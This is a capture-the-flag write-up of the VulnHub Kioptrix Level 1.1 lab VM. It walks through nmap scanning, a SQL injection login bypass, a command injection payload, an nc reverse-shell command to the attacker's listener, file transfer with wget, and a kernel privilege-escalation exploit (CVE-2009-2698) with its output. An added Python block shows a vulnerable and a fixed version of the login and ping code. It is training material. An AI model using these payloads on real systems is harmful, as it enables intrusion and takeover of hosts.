VulnHub – Kioptrix: Level 1.1 (#2) walkthrough

Kioptrix: Level 1.1 (#2) description and download link
https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

Use an Nmap ping sweep to find the target's IP; the IP found is 192.168.112.252

root@hackercat:~/vulnhub/kioptrix-level-2# nmap -sP 192.168.112.0/24
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-03 08:29 EST
Nmap scan report for 192.168.112.1
Host is up (0.0013s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.112.2
Host is up (0.00013s latency).
MAC Address: 00:50:56:F7:2E:D5 (VMware)
Nmap scan report for 192.168.112.252
Host is up (0.00023s latency).
MAC Address: 00:0C:29:CF:1B:EB (VMware)
Nmap scan report for 192.168.112.254
Host is up (0.000098s latency).
MAC Address: 00:50:56:E0:3D:E8 (VMware)
Nmap scan report for 192.168.112.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.23 seconds

Use Nmap to port-scan it and see which interesting services are running:
ssh, http, rpcbind, https, ipp and mysql are open.

root@hackercat:~/vulnhub/kioptrix-level-2# nmap -F -T4 192.168.112.252
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-03 09:11 EST
Nmap scan report for 192.168.112.252
Host is up (0.00077s latency).
Not shown: 94 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
443/tcp  open  https
631/tcp  open  ipp
3306/tcp open  mysql
MAC Address: 00:0C:29:CF:1B:EB (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds
root@hackercat:~/vulnhub/kioptrix-level-2# cat 192.168.112.252_allPortTCP.txt 
# Nmap 7.80 scan initiated Mon Feb  3 09:12:24 2020 as: nmap -v -sV -Pn -sC -p- -oN 192.168.112.252_allPortTCP.txt 192.168.112.252
Nmap scan report for 192.168.112.252
Host is up (0.0030s latency).
Not shown: 65528 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey: 
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind    2 (RPC #100000)
443/tcp  open  ssl/https?
|_ssl-date: 2020-02-03T12:03:43+00:00; -2h09m35s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|_    SSL2_RC4_64_WITH_MD5
631/tcp  open  ipp        CUPS 1.1
| http-methods: 
|   Supported Methods: GET HEAD OPTIONS POST PUT
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
682/tcp  open  status     1 (RPC #100024)
3306/tcp open  mysql      MySQL (unauthorized)
MAC Address: 00:0C:29:CF:1B:EB (VMware)
Host script results:
|_clock-skew: -2h09m35s
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Feb  3 09:14:18 2020 -- 1 IP address (1 host up) scanned in 113.24 seconds

Let's look at the web service first. Browsing to HTTP, there's a login screen.

The instinctive first move is to try SQL injection, entering the following:

' or '5'='5

And just like that, we're logged in XDDD

There's a feature that asks us to ping a host.
Enter one of our own internal network IPs to try it;
it turns out the page really runs the command and shows the ping output.

So here we can try command injection, entering:

; id

Once again the injection just works XD
The id command ran and its output was displayed.

Since we can inject commands, try using nc to get a reverse shell.
Enter the commands below; the first line is the injected one, the second is the listener on the local machine:
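As an added illustration (not code from the original post or from the Kioptrix VM, whose source is not shown here), the following Python models why the two inputs above work and what the fix looks like: the login check with string-built SQL next to a parameterised one, and a ping front-end that validates the host and builds an argv list instead of handing a string to a shell. The user table and password are constructed for the example.

```python
import re
import ipaddress
import sqlite3

# Constructed in-memory stand-in for the application's user table (assumption:
# the real app's schema is not shown on the page; the password is made up).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'made-up-password')")
    return conn

def login_vulnerable(conn, username, password):
    # The query is built by string concatenation, so a quote in the input ends
    # the literal and "or '5'='5" turns the WHERE clause into a tautology.
    sql = ("SELECT username FROM users WHERE username='" + username
           + "' AND password='" + password + "'")
    return conn.execute(sql).fetchone() is not None

def login_fixed(conn, username, password):
    # Bound parameters: the driver passes the input as data, never as SQL text.
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None

def valid_host(host):
    # Accept a literal IP address or a plain hostname and nothing else, so a
    # value such as "192.168.112.128; id" is rejected before any command runs.
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return re.fullmatch(r"[A-Za-z0-9.-]{1,253}", host) is not None

def ping_argv(host):
    # Returns the argv list to pass to subprocess.run() WITHOUT shell=True;
    # the host is a single argument and is never parsed by a shell.
    if not valid_host(host):
        raise ValueError("rejected host: %r" % host)
    return ["ping", "-c", "3", host]
```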

nc -c /bin/sh 192.168.112.128 4444
nc -lvp 4444

No luck; maybe nc isn't installed on the target.
Try a different kind of reverse shell:
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
The bash one works.

But we're still running with apache's privileges, so try privilege escalation.
First git clone linux-exploit-suggester on the local machine:
https://github.com/mzet-/linux-exploit-suggester
Tried it, but git isn't installed on the target, so the file has to be transferred some other way.

There are many ways to get the file over; here a python web server is used. Run it locally:

root@hackercat:~/GithubTools/linux-exploit-suggester# ls
CHANGELOG  LICENSE  linux-exploit-suggester.sh  README.md
root@hackercat:~/GithubTools/linux-exploit-suggester# python -m SimpleHTTPServer 
Serving HTTP on 0.0.0.0 port 8000 ...

On the target, try fetching it with wget:

bash-3.00$ wget http://192.168.112.128:8000/linux-exploit-suggester.sh
--06:38:54--  http://192.168.112.128:8000/linux-exploit-suggester.sh
           => `linux-exploit-suggester.sh'
Connecting to 192.168.112.128:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 83,454 (81K) [text/x-sh]
linux-exploit-suggester.sh: Permission denied
Cannot write to `linux-exploit-suggester.sh' (Permission denied).

The response above indicates a permissions problem (the current directory is not writable),
so switch directories: on the target, cd to /tmp and fetch it again,
and it succeeds!

bash-3.00$ cd /tmp
bash-3.00$ wget http://192.168.112.128:8000/linux-exploit-suggester.sh
--06:39:48--  http://192.168.112.128:8000/linux-exploit-suggester.sh
           => `linux-exploit-suggester.sh'
Connecting to 192.168.112.128:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 83,454 (81K) [text/x-sh]
    0K .......... .......... .......... .......... .......... 61%   28.11 MB/s
   50K .......... .......... .......... .                    100%   74.12 MB/s
06:39:48 (36.98 MB/s) - `linux-exploit-suggester.sh' saved [83454/83454]
bash-3.00$ ls
linux-exploit-suggester.sh

It turns out the bash version is too old to run it?!!!

bash-3.00$ ./linux-exploit-suggester.sh
bash: ./linux-exploit-suggester.sh: Permission denied
bash-3.00$ chmod +x linux-exploit-suggester.sh
bash-3.00$ ./linux-exploit-suggester.sh
Script needs Bash in version 4.0 or newer. Aborting.

Fine then… try another method.

bash-3.00$ uname -r
2.6.9-55.EL

Let's start from this kernel version instead. Using searchsploit,
searchsploit 2.6.9 turns up one that looks quite interesting:

Linux Kernel 2.6.9 < 2.6.11 (RHEL 4) - 'SYS_EPoll_Wait' Local Integer Overflow / Local Privilege Escalation                                         | exploits/linux/local/1397.c

Ran it, but the target doesn't have this vulnerability QQ

A bit of googling found another POC:
https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack/blob/master/2009/CVE-2009-2698/CVE-2009-2698.c

Tried it, and privilege escalation succeeded:

root@hackercat:~/vulnhub/kioptrix-level-2# nc -lvp 4444
listening on [any] 4444 ...
192.168.112.252: inverse host lookup failed: Unknown host
connect to [192.168.112.128] from (UNKNOWN) [192.168.112.252] 32774
bash: no job control in this shell
bash-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-3.00$ wget http://192.168.112.128:8000/CVE-2009-2698.c
--06:52:20--  http://192.168.112.128:8000/CVE-2009-2698.c
           => `CVE-2009-2698.c'
Connecting to 192.168.112.128:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,645 (2.6K) [text/plain]
CVE-2009-2698.c: Permission denied
Cannot write to `CVE-2009-2698.c' (Permission denied).
bash-3.00$ cd /tmp
bash-3.00$ wget http://192.168.112.128:8000/CVE-2009-2698.c
--06:52:35--  http://192.168.112.128:8000/CVE-2009-2698.c
           => `CVE-2009-2698.c'
Connecting to 192.168.112.128:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,645 (2.6K) [text/plain]
    0K ..                                                    100%  420.41 MB/s
06:52:35 (420.41 MB/s) - `CVE-2009-2698.c' saved [2645/2645]
bash-3.00$ gcc CVE-2009-2698.c -o cve
bash-3.00$ ./cve
sh: no job control in this shell
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)

This one also works:
https://www.exploit-db.com/exploits/9542
It is the same CVE-2009-2698.
